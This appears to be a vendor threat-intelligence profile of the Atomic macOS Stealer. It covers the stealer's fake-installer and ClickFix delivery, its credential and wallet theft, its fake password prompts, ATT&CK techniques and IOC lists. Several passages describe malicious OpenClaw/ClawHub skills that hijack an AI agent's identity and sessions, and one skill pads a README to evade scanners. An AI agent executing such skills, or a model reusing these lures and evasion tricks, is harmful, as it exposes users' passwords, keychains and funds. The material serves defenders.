Atomic Stealer
Atomic macOS Stealer, also known as AMOS, Atomic Stealer, Atomic MacOS Stealer, and Shamos, is a macOS-focused information stealer sold or rented via Telegram and repeatedly observed in crimeware, malvertising, phishing, fake software installer, and paste-and-run/ClickFix delivery campaigns. It is distributed in DMG-based installers and fake application bundles impersonating legitimate software such as Tor Browser, Notion, Microsoft Office, Photoshop CC, TradingView-related tools, and Homebrew, and has also been embedded in malicious OpenClaw/ClawHub skills. Earlier campaigns commonly instructed victims to bypass Gatekeeper via right-click and Open; after Apple patched that bypass in October 2024, reporting indicates a shift toward ClickFix and Terminal paste-and-run social engineering.
AMOS is designed to steal sensitive data from macOS systems, especially browser and locally stored secrets. Reported capabilities include theft of browser credentials, cookies, session tokens, autofill data, stored payment card data, browser history, browser profile data, Keychain data including login.keychain-db, SSH keys, messaging app data, Apple Notes data, Safari cookies, user documents, and cryptocurrency wallet data. Targeted browsers mentioned across reporting include Chrome, Brave, Edge, Vivaldi, Opera, Arc, CocCoc, Yandex, Firefox and Firefox-derived browsers, and Safari. Targeted wallet applications and artifacts include Electrum, Binance, Exodus, Atomic Wallet, Coinomi, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Dogecoin Wallet, TonKeeper, and numerous cryptocurrency browser extensions. Some reports also note theft from Telegram Desktop and Discord, and replacement of Ledger Live and Trezor Suite with malicious versions.
Behaviorally, AMOS commonly uses AppleScript or osascript-driven fake macOS or System Preferences authentication dialogs to capture the victim’s local password, validating it in some variants with /usr/bin/dscl -authonly. Multiple reports describe a smash-and-grab model without persistence, though newer variants and related reporting note Python-assisted collection, anti-analysis checks for VMware, and in some cases overlap in tradecraft with RustDoor and similarities with Odyssey/Poseidon AppleScript logic. One Bitdefender-described variant drops an XOR-decoded Python script to /var/tmp/olx, collects browser, wallet, Safari cookie, system_profiler, and login.keychain-db data, and exfiltrates an in-memory ZIP archive via HTTP POST to /p2p on 5.42.65.114.
AMOS has been associated in reporting with Russian threat activity and has also been used by criminal ecosystems such as Crazy Evil. It has remained one of the most prevalent and popular macOS stealers through 2024 and 2025, frequently cited alongside Poseidon/Odyssey and Cthulhu as notable macOS threats.
High-confidence infrastructure and indicators mentioned in the content include amos-malware[.]ru/sendlog, 37.220.87[.]16:5000/sendlog, 94.142.138[.]177/sendlog, 5.42.65.114/p2p, 91.92.242[.]30 and 91.92.242[.]30/lamq4, nextnovatech.com, wooofi.com, slackcomtop.aab-e-pak.com, slackforbusiness.net including /api.php and /main.php, macpaw.us, svs-verificationdate[.]beer, and 196.251.107[.]171. Sample hashes and related indicators explicitly cited include Setup.dmg SHA256 15f39e53a2b4fa01f2c39ad29c7fe4c2fef6f24eff6fa46b8e77add58e7ac709; Sophos-listed AMOS sample hashes 01082cd4733e5f3e2c3f642fa6c0afb5a9489d39ff26a35549263fc0e02ebad3, bda2503fc02b11258399cfabd0778a997654b5bd7d30e5e3f5bef54a74b914e1, c43e506c9b964dddf6fd784bf0cc78b4a2396f47257361dc22e1070e249eae16, 4dce8b3beba71b8b44b6576ff2497ed68c6fafebd046822f0d60f8758238e900, 564b21c293bc9d0885dc7a87dbf488a497c98d2103d91f5bbcfdb476eb8b6f4c, b351e3f475681ab2e8db5b2bbd2beaf26e5b4fd082ca08eba6fffbc76370113c, 8891e7562eb4db253a8582376083ca99b19457680f9d36a5ba4108790740785e, 716778bab5fb2c439a51362be5941a50d587714d58a6faa39eefa96aa79c1561, d23491dd351f43f0efad5cee2be80c4049349a7695c0e7de1de632c791356183, and 7bcfcc90d0bd6c85b5b1cc9f287e161020571a0418afb50f2dd67685e9d3a4fc.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"A critical remote code execution (RCE) vulnerability, identified as CVE-2025-55182 and dubbed React2Shell, exists within the React Server Components (RSC) architecture, allowing unauthenticated attackers to execute arbitrary code..."
The campaign coincides with the disclosure of a high-severity OpenClaw vulnerability (CVE-2026-25253) that enables one-click remote code execution through token exfiltration and WebSocket hijacking. Although patched in late January 2026, the flaw points to the platform’s growing attack surface.
Groups observed using it
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
A separate skill called omnicogg embedded the AMOS malware dropper inside a README.md file, then padded it with 22 MB of junk characters to exceed file size limits that most scanning pipelines enforce.
The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
Diversified Malware Toolkit: Crazy Evil uses advanced tools like Stealc and AMOS for Windows and macOS, ensuring widespread compromise.
Odyssey isn’t original work. It’s a direct rebrand of Poseidon Stealer, which itself was forked from Atomic macOS Stealer (AMOS).
Odyssey isn’t original work. It’s a direct rebrand of Poseidon Stealer, which itself was forked from Atomic macOS Stealer (AMOS).
Two new AMOS (Atomic macOS Stealer) samples uploaded to MalwareBazaar reveal a significant evolution of the macOS stealer family.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 technique
Reconnaissance
Resource Development
2 techniques
Resource Development
Initial Access
1 technique
Initial Access
Execution
5 techniques
Execution
These skills deployed infostealers, reverse shells and the Atomic macOS Stealer malware, exfiltrating browser credentials, keychains, SSH keys and crypto wallets.
...both being Go-based infostealers that also use osascript to display error messages to the user on execution...
After running the Terminal command, the attack downloads a malicious DMG from svs-verificationdate[.]beer using curl with the quiet " -fsSL " flags and saves it to the /tmp folder under a random filename.
the campaign begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves.
OpenClaw is an AI agent that runs third-party skills sourced from ClawHub, a dedicated marketplace. These skills are markdown-driven packages with deep access to local systems. When a malicious skill is installed, it can seize full control of the agent’s identity and execute unauthorized actions through the agent’s own authenticated sessions.
Stealth
4 techniques
Stealth
A separate skill called omnicogg embedded the AMOS malware dropper inside a README.md file, then padded it with 22 MB of junk characters to exceed file size limits that most scanning pipelines enforce.
Each of these skills mimicked a legitimate tool. The TradingView skills appeared to be trader productivity aids, and omnicogg passed for a general utility.
Defense Impairment
1 technique
Defense Impairment
Credential Access
7 techniques
Credential Access
Atomic does not attempt to gain persistence... Atomic Stealer uses a crude but effective means of extracting the user’s login password via AppleScript spoofing.
The TA also provides additional services such as a web panel for managing victims, meta mask brute-forcing for stealing seed and private keys...
It steals cookies, login databases, autofill information, stored payment cards, and browser profile data.
The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
In addition to obtaining the system password, the malware also targets the password management tool by utilizing the main_keychain() function to extract sensitive information from the victim’s machine.
Discovery
2 techniques
Discovery
Collection
3 techniques
Collection
The malware also steals Telegram Desktop and Discord data, Apple Notes databases, Safari cookies, Apple Keychain database files, and user documents with the PDF, TXT, or RTF extensions.
IOCs tracked for this family
436 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
161 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
AMOS is described here as a malware dropper embedded in a malicious skill and concealed with file-padding to evade marketplace scanning limits.
A macOS-focused infostealer distributed via malicious OpenClaw skills on the ClawHub marketplace.
A macOS stealer previously documented harvesting login.keychain-db and browser data.
A macOS infostealer delivered via malicious OpenClaw/ClawHub skills, including Base64-encoded curl-pipe-bash droppers and persistent auto-updater mechanisms communicating with C2 infrastructure.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.